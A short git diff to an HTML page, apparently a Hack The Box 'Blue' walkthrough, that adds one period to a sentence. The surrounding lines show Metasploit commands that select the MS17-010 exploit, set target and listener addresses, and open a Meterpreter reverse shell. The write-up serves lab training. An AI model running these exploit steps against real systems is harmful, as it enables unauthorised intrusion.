--- a/hack/hacks/blue.html
+++ b/hack/hacks/blue.html
@@ -171,7 +171,7 @@
         <p>Metasploit has this exploit available.</p>
         <pre><code>msfconsole</br>search ms17-010</code></pre>
         <img src="../images/blue8.png">
-        <p>We'll use the first one, set our options, and run the exploit</p>
+        <p>We'll use the first one, set our options, and run the exploit.</p>
         <pre><code>use 0</br>set rhost 10.10.10.40</br>set lhost 10.10.14.3</br>set lport 4444</br>run</code></pre>
         <img src="../images/blue9.png">
         <p>The exploit worked, we now have a Meterpreter shell. We can drop a shell into the machine and check our user.</p>
